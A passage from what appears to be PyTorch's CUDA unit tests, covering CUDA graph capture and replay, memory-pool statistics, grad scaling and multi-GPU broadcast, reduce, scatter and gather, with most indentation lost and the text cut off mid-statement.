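# 11 and b.sum() == 1000 * 11.
def _graph_capture_expectation_sketch():
    b = torch.full((1000,), 1.0)
    for _ in range(10):
        b = b + 1
    assert b.sum().item() == 11000.0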
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda._Graph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda._Graph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
g2 = torch.cuda._Graph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If the graphs share a mempool, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" to have mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda._Graph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda._Graph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# dummy allocation triggers process_events; hopefully it successfully processes b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda._Graph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda._Graph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# warmup
weight.grad = (scaler.scale(static_grad) * static_input).half().float()
# capture
g.capture_begin()
weight.grad = (scaler.scale(static_grad) * static_input).half().float()
# The above simulates a rudimentary backward pass.
# TODO: Once full-backward() capture is enabled (see https://github.com/pytorch/pytorch/pull/54227)
# change to
# loss = (w.half() * static_input).sum()
# scaler.scale(loss).backward()
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
